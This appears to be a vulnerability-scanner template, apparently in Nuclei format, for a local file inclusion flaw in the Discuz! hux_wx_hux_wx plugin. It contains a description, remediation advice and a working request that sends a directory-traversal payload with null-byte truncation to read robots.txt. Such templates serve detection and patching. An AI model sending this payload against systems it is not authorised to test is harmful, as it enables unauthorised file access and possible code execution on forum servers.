id: Discuz-lfd-hux_wx
info:
  name: Discuz! hux_wx_hux_wx arbitrary file inclusion vulnerability
  author:
  - 折跃
  description: |-
    Discuz! hux_wx_hux_wx plugin file inclusion vulnerability.
    Discuz! is a generic community forum software system.

    The Discuz! hux_wx_hux_wx plugin has a local file inclusion vulnerability. An attacker can exploit it to access locations outside the restricted directories and perform file inclusion attacks, resulting in code execution when local files are included.
  severity: high
  remediation: |-
    Official Fix:
    1. It is recommended that users obtain the latest patch or the latest version from the official site:
    http://discuz.net/

    Temporary Fix:
    1. Use open_basedir in PHP to restrict access to a specified area, and enable path-length truncation.
    2. Filter "." (dot) and "/" (slash) and "\" (backslash), and bypass via encoding.
    3. Disable server-side remote file inclusion.
    4. When included file extensions are restricted, forbid %00 truncation (update PHP to the latest version). If the PHP version is less than 5.3, php.ini has magic_quotes_gpc = off, and the addslashes function is not used on controllable parameters, these three conditions allow %00 truncation.
    5. Bypass using "?", "#", and spaces (remote).
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code==200
    - contains(body,'User-agent')
    - contains(body,'Disallow')
  path:
  - '{{BaseURL}}/plugin.php?id=hux_wx:hux_wx&uid=1&mod=../../../..&ac=robots.txt%00'
  method: GET
  headers:
    Host: '{{Hostname}}'
  req-condition: true
